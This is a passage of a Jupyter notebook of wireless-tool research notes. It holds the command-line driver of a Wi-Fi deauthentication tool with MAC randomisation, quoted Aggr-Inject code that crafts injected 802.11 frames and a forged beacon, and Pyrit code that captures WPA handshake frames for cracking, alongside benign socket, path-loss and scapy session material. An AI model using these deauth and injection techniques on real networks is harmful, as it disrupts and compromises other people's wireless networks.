" /_\\ _ _| |_ ___| \\ ___ __ _ _ _| |_| |_ \n",
" / _ \\ || | _/ _ \\ |) / -_) _` | || | _| ' \\ \n",
" /_/ \\_\\_,_|\\__\\___/___/\\___\\__,_|\\_,_|\\__|_||_|\\n\"\"\"\n",
" )\n",
" parser = argparse.ArgumentParser(description=\"Auto Deauth Tool\")\n",
" parser.add_argument(\n",
" \"--interface\",\n",
" \"-i\",\n",
" help=\"Interface to fetch WiFi networks and send deauth packets (must support packet injection) \",\n",
" required=True,\n",
" )\n",
" parser.add_argument(\n",
" \"--blacklist\",\n",
" \"-b\",\n",
" help=\"List of networks ssids/mac addresses to avoid (Comma seperated)\",\n",
" type=lambda arg: arg.split(\",\"),\n",
" )\n",
" parser.add_argument(\n",
" \"--whitelist\",\n",
" \"-w\",\n",
" help=\"List of networks ssids/mac addresses to target (Comma seperated)\",\n",
" type=lambda arg: arg.split(\",\"),\n",
" )\n",
" parser.add_argument(\"--led\", \"-l\", help=\"Led pin number for led display\", type=int)\n",
"    # type=float: without it a value given on the command line arrives as a\n",
"    # string and is handed unchanged to scapy's sendp(inter=...)\n",
"    parser.add_argument(\n",
"        \"--time\",\n",
"        \"-t\",\n",
"        help=\"Time (in s) between two deauth packets (default 0)\",\n",
"        type=float,\n",
"        default=0,\n",
"    )\n",
" parser.add_argument(\n",
" \"--random\",\n",
" \"-r\",\n",
" help=\"Randomize your MAC address before deauthing each network\",\n",
" default=False,\n",
" action=\"store_true\",\n",
" )\n",
" parser.add_argument(\n",
" \"--ignore\",\n",
" help=\"Ignore errors encountered when randomizing your MAC address\",\n",
" default=False,\n",
" action=\"store_true\",\n",
" )\n",
" parser.add_argument(\n",
" \"--count\",\n",
" \"-c\",\n",
" help=\"Number of packets to send (default 5000)\",\n",
" type=int,\n",
" default=5000,\n",
" )\n",
" parser.add_argument(\n",
" \"--verbose\",\n",
" \"-v\",\n",
" help=\"Scapy verbosity setting (default: 0)\",\n",
" type=int,\n",
" default=0,\n",
" )\n",
" args = parser.parse_args()\n",
" data = vars(args)\n",
" if args.led:\n",
" try:\n",
" GPIO.setmode(GPIO.BOARD)\n",
" except (NameError, ImportError, RuntimeError):\n",
" # GPIO Mode can only be ran on a raspberry pi\n",
" # File \"/usr/local/lib/python3.10/dist-packages/RPi/GPIO/__init__.py\", line 23, in <module>\n",
" #\n",
" # from RPi._GPIO import *\n",
" # RuntimeError: This module can only be run on a Raspberry Pi!\n",
"\n",
" exit(\n",
" \"Unable to setup LED indicator, it doesnt look like you are running using raspberry pi\"\n",
" )\n",
" a = AutoDeauth(**data)\n",
" try:\n",
" a.start()\n",
" except OSError:\n",
" time.sleep(30)\n",
" a.start()\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Setting up client / server ipc connections\n",
"\n",
"This approach was derived entirely from suggestions made by the Codeium AI assistant, but familiarity with the technology confirms the feasibility and validity of the approach.\n",
"\n",
"The concept is to configure the daemon to be an IPC server, and separately create an IPC client that connects to it, then queries and receives data from the daemon."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Server implementation"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"import socket\n",
"\n",
"# Create a server socket; the with-block closes it even if a later step raises\n",
"with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:\n",
"    # Let the cell be re-run right away without \"Address already in use\"\n",
"    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n",
"\n",
"    # Bind the server socket to a specific address and port\n",
"    server_address = ('localhost', 12345)\n",
"    server_socket.bind(server_address)\n",
"\n",
"    # Start listening for incoming connections\n",
"    server_socket.listen()\n",
"\n",
"    # Accept a client connection (blocks until a client connects)\n",
"    client_socket, client_address = server_socket.accept()\n",
"\n",
"    # The client socket is closed when this block exits\n",
"    with client_socket:\n",
"        # Receive data from the client\n",
"        data = client_socket.recv(1024)\n",
"\n",
"        # Process the received data\n",
"\n",
"        # Send a response back to the client\n",
"        response = 'Hello from the server!'\n",
"        # sendall() keeps writing until the whole payload is sent;\n",
"        # send() may write only part of it\n",
"        client_socket.sendall(response.encode())"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### Client implementation"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"import socket\n",
"\n",
"# Create a client socket; the with-block closes it even if a later step raises\n",
"with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as client_socket:\n",
"    # Connect to the server\n",
"    server_address = ('localhost', 12345)\n",
"    client_socket.connect(server_address)\n",
"\n",
"    # Send data to the server\n",
"    data = 'Hello from the client!'\n",
"    # sendall() keeps writing until the whole payload is sent;\n",
"    # send() may write only part of it\n",
"    client_socket.sendall(data.encode())\n",
"\n",
"    # Receive a response from the server\n",
"    response = client_socket.recv(1024)\n",
"\n",
"    # Process the response"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Scapy Examples from popular programs (Circa 2018)\n",
"\n",
"Below are examples of popular scapy functions."
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 1. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"def __init__(self, recv_mac, trans_mac, dst_mac):\n",
" self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" self.dot11hdr = Dot11(type=\"Data\", subtype=DOT11_SUBTYPE_DATA, addr1=recv_mac, addr2=trans_mac, addr3=dst_mac, SC=0x3060, FCfield=0x01)\n",
" self.data = self.rt / self.dot11hdr\n",
" self.recv_mac = recv_mac\n",
" self.trans_mac = trans_mac\n",
" self.dst_mac = dst_mac\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 2. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
" def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):\n",
" self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" self.dot11hdr = Dot11(type=\"Data\", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw(\"\\x80\\x00\")\n",
" self.data = self.rt / self.dot11hdr\n",
" self.num_subframes = 0\n",
" self.recv_mac = recv_mac\n",
" self.src_mac = src_mac\n",
" self.dst_mac = dst_mac"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 3. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
" def __init__(self, recv_mac, src_mac, dst_mac, ds=0x01):\n",
" self.rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" self.dot11hdr = Dot11(type=\"Data\", subtype=DOT11_SUBTYPE_QOS_DATA, addr1=recv_mac, addr2=src_mac, addr3=dst_mac, SC=0x3060, FCfield=ds) / Raw(\"\\x00\\x00\")\n",
" self.data = self.rt\n",
" self.num_subframes = 0\n",
" self.recv_mac = recv_mac\n",
" self.src_mac = src_mac\n",
" self.dst_mac = dst_mac\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 4. Pyrit"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"# May result in 'anonymous' AP\n",
" self._add_ap(ap_mac, dot11_pckt)\n",
" ap = self.air[ap_mac]\n",
"\n",
" self._add_station(ap, sta_mac)\n",
" sta = ap[sta_mac]\n",
"\n",
" if EAPOL_WPAKey in dot11_pckt:\n",
" wpakey_pckt = dot11_pckt[EAPOL_WPAKey]\n",
" elif EAPOL_RSNKey in dot11_pckt:\n",
" wpakey_pckt = dot11_pckt[EAPOL_RSNKey]\n",
" elif dot11_pckt.isFlagSet('type', 'Data') \\\n",
" and dot11_pckt.haslayer(scapy.layers.dot11.Dot11WEP):\n",
" # An encrypted data packet - maybe useful for CCMP-attack\n",
"\n",
" dot11_wep = str(dot11_pckt[scapy.layers.dot11.Dot11WEP])\n",
" # Ignore packets which has less than len(header + data + signature)\n",
" if len(dot11_wep) < 8 + 6 + 8:\n",
" return\n",
"\n",
" # Ignore packets with high CCMP-counter. A high CCMP-counter\n",
" # means that we missed a lot of packets since the last\n",
" # authentication which also means a whole new authentication\n",
" # might already have happened.\n",
" ccmp_counter = (dot11_wep[0:2] + dot11_wep[4:8])[::-1]\n",
" if int(binascii.hexlify(ccmp_counter), 16) < 30:\n",
" self._add_ccmppckt(sta, pckt)\n",
" return\n",
" else:\n",
" return\n",
"\n",
" # Frame 1: pairwise set, install unset, ack set, mic unset\n",
" # results in ANonce\n",
" if wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'ack')) \\\n",
" and wpakey_pckt.areFlagsNotSet('KeyInfo', ('install', 'mic')):\n",
" self._add_keypckt(sta, 0, pckt)\n",
" return\n",
"\n",
" # Frame 2: pairwise set, install unset, ack unset, mic set,\n",
" # SNonce != 0. Results in SNonce, MIC and keymic_frame\n",
" elif wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'mic')) \\\n",
" and wpakey_pckt.areFlagsNotSet('KeyInfo', ('install', 'ack')) \\\n",
" and not all(c == '\\x00' for c in wpakey_pckt.Nonce):\n",
" self._add_keypckt(sta, 1, pckt)\n",
" return\n",
"\n",
" # Frame 3: pairwise set, install set, ack set, mic set\n",
" # Results in ANonce\n",
" elif wpakey_pckt.areFlagsSet('KeyInfo', ('pairwise', 'install', \\\n",
" 'ack', 'mic')):\n",
" self._add_keypckt(sta, 2, pckt)\n",
" return\n"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### 5. Aggr-Inject"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"def ssid_packet():\n",
" ap_mac = '00:00:00:00:00:00'\n",
" rt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna', notdecoded='\\x00\\x6c' + get_frequency(CHANNEL) + '\\xc0\\x00\\xc0\\x01\\x00\\x00')\n",
" beacon_packet = Dot11(subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=ap_mac, addr3=ap_mac) \\\n",
" / Dot11Beacon(cap=0x2105) \\\n",
" / Dot11Elt(ID='SSID', info=\"injected SSID\") \\\n",
" / Dot11Elt(ID='Rates', info=AP_RATES) \\\n",
" / Dot11Elt(ID='DSset', info=chr(CHANNEL))\n",
"\n",
" # Update sequence number\n",
" beacon_packet.SC = 0x3060\n",
"\n",
" # Update timestamp\n",
" beacon_packet[Dot11Beacon].timestamp = time.time()\n",
"\n",
" mpdu_len = len(beacon_packet) + 4\n",
"\n",
" if mpdu_len % 4 != 0:\n",
" padding = \"\\x00\" * (4 - (mpdu_len % 4)) # Align to 4 octets\n",
" else:\n",
" padding = \"\"\n",
" mpdu_len <<= 4\n",
" crc_fun = crcmod.mkCrcFun(0b100000111, rev=True, initCrc=0x00, xorOut=0xFF)\n",
"\n",
" crc = crc_fun(struct.pack('<H', mpdu_len))\n",
" maccrc = dot11crc(str(beacon_packet))\n",
" delim_sig = 0x4E\n",
"\n",
" #print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))\n",
" #hexdump(maccrc)\n",
" ampdu_header = struct.pack('<HBB', mpdu_len, crc, delim_sig)\n",
" #hexdump(ampdu_header)\n",
"\n",
" data = ampdu_header / beacon_packet / maccrc / padding\n",
" data /= \"\\x00\\x00\\x20\\x4e\" * 8\n",
" data = str(data)\n",
"\n",
" return data"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Calculating distance of a wireless device\n",
"\n",
"This is where I wish I had paid more attention in math class.\n",
"\n",
"### Calculating Free-Space Path Loss (FSPL)\n",
"\n",
"`FSPL (dB) = 20log10(d) + 20log10(f) + K`\n",
"\n",
"where:\n",
"\n",
"- `d` = distance\n",
"- `f` = frequency\n",
"- `K` = constant that depends on the units used for `d` and `f`\n",
"\n",
"If `d` is measured in kilometers and `f` in MHz, the formula is:\n",
"\n",
"`FSPL (dB) = 20log10(d)+ 20log10(f) + 32.44`\n",
"\n",
"Free Space Path Loss=Tx Power-Tx Cable Loss+Tx Antenna Gain+Rx Antenna Gain - Rx Cable Loss - Rx Sensitivity - Fade Margin \n",
"\n",
"FSPL = Tx Power - Tx CBLS + Tx AntGain + Rx AntGain - RxCBLS - Rx Sensitivity - Fade Margin"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Debugging Output"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"\n",
"\n",
"```shell\n",
" █▀▀█ █▀▀█ █▀▀█ █──█ █▀▀ █──█ ─▀─ █▀▀▄ █▀▀▀ ▀▀█▀▀ ─▀─ █▀▀▀ █▀▀ █▀▀█\n",
"░█─── █▄▄▀ █──█ █──█ █── █▀▀█ ▀█▀ █──█ █─▀█ ─░█── ▀█▀ █─▀█ █▀▀ █▄▄▀\n",
"░█▄▄█ ▀─▀▀ ▀▀▀▀ ─▀▀▀ ▀▀▀ ▀──▀ ▀▀▀ ▀──▀ ▀▀▀▀ ─░█── ▀▀▀ ▀▀▀▀ ▀▀▀ ▀─▀▀\n",
"INFO: Started crouching tiger\n",
"INFO: Started logger...\n",
"INFO: Started crouching tiger\n",
"INFO: Started logger...\n",
"INFO: Beginning Mac Purge\n",
"DEBUG: args: $Namespace(name='wlan0', config_file='config_path', log_level='DEBUG', log_file='/var/log/ctiger.log', module='mac', mon_type='switch', valid_file='ct_valid.csv', channels='1,7,6,11', fun=<function Purge.mac_purge at 0x7f9166405a80>)\n",
"DEBUG: Kwargs: ${'name': 'wlan0', 'config_file': 'config_path', 'log_level': 'DEBUG', 'log_file': '/var/log/ctiger.log', 'module': 'mac', 'mon_type': 'switch', 'valid_file': 'ct_valid.csv', 'channels': '1,7,6,11', 'fun': <function Purge.mac_purge at 0x7f9166405a80>}\n",
"DEBUG: Interface: $None\n",
"DEBUG: Self Interface: $None\n",
"DEBUG: Monitor Type: $switch\n",
"DEBUG: Kwargs: ${'interface': 'wlan0', 'mon_type': 'switch', 'valid_file': 'ct_valid.csv', 'channels': '1,7,6,11'}\n",
"DEBUG: Interface: $wlan0\n",
"DEBUG: Self Interface: $wlan0\n",
"DEBUG: Monitor Type: $switch\n",
"DEBUG: Kwargs: ${}\n",
"DEBUG: Interface: $None\n",
"DEBUG: Self Interface: $None\n",
"DEBUG: Monitor Type: $None\n",
"DEBUG: Monitor Type:\n",
"DEBUG: mac_address: $3d:1d:06:fd:9b:e1\n",
"DEBUG: Monitor Type: $None\n",
"INFO: Starting monitor interface\n",
"DEBUG: Invalid monitor type\n",
"```"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Custom Scapy Sessions\n",
"\n",
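"One can configure their own scapy session by extending `DefaultSession` and passing the subclass to `sniff(session=...)`, as the code below shows."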
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": [
"# SPDX-License-Identifier: GPL-2.0-only\n",
"# This file is part of Scapy\n",
"# See https://scapy.net/ for more information\n",
"\n",
"\"\"\"\n",
"Sessions: decode flow of packets when sniffing\n",
"\"\"\"\n",
"\n",
"from collections import defaultdict\n",
"import socket\n",
"import struct\n",
"\n",
"from scapy.compat import orb\n",
"from scapy.config import conf\n",
"from scapy.packet import NoPayload, Packet\n",
"from scapy.pton_ntop import inet_pton\n",
"\n",
"# Typing imports\n",
"from typing import (\n",
" Any,\n",
" DefaultDict,\n",
" Dict,\n",
" Iterator,\n",
" List,\n",
" Optional,\n",
" Tuple,\n",
" cast,\n",
" TYPE_CHECKING,\n",
")\n",
"from scapy.compat import Self\n",
"if TYPE_CHECKING:\n",
" from scapy.supersocket import SuperSocket\n",
"\n",
"\n",
"# You will only need to extend the Default Session\n",
"class DefaultSession(object):\n",
" \"\"\"Default session: no stream decoding\"\"\"\n",
"\n",
" def __init__(self, supersession: Optional[Self] = None):\n",
" if supersession and not isinstance(supersession, DefaultSession):\n",
" supersession = supersession()\n",
" self.supersession = supersession\n",
"\n",
" def process(self, pkt: Packet) -> Optional[Packet]:\n",
" \"\"\"\n",
" Called to pre-process the packet\n",
" \"\"\"\n",
" # Optionally handle supersession\n",
" if self.supersession:\n",
" return self.supersession.process(pkt)\n",
" return pkt\n",
"\n",
" def recv(self, sock: 'SuperSocket') -> Iterator[Packet]:\n",
" \"\"\"\n",
" Will be called by sniff() to ask for a packet\n",
" \"\"\"\n",
" pkt = sock.recv()\n",
" if not pkt:\n",
" return\n",
" pkt = self.process(pkt)\n",
" if pkt:\n",
" yield pkt\n",
" \n",
" \n",
"class Dot11Session(DefaultSession):\n",
" \"\"\"Decode Dot11 packets 'on-the-flow'.\n",
"\n",
" Usage:\n",
" >>> sniff(session=Dot11Session)\n",
" \"\"\"\n",
"\n",
" def __init__(self, *args, **kwargs):\n",
" # type: (*Any, **Any) -> None\n",
" DefaultSession.__init__(self, *args, **kwargs)\n",
" self.keys = {} # type: Dict[Tuple[Any, ...], List[Packet]] # noqa: E501\n",
"\n",
"\n",
"class IPSession(DefaultSession):\n",
" \"\"\"Defragment IP packets 'on-the-flow'.\n",
"\n",
" Usage:\n",
" >>> sniff(session=IPSession)\n",
" \"\"\"\n",
"\n",
" def __init__(self, *args, **kwargs):\n",
" # type: (*Any, **Any) -> None\n",
" DefaultSession.__init__(self, *args, **kwargs)\n",
" self.fragments = defaultdict(list) # type: DefaultDict[Tuple[Any, ...], List[Packet]] # noqa: E501\n",
"\n",
" def process(self, packet: Packet) -> Optional[Packet]:\n",
" from scapy.layers.inet import IP, _defrag_ip_pkt\n",
" if IP not in packet:\n",
" return packet\n",
" return _defrag_ip_pkt(packet, self.fragments)[1] # type: ignore\n"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"name": "python",
"version": "3.11.6"
},
"orig_nbformat": 4
},
"nbformat": 4,
"nbformat_minor": 2
}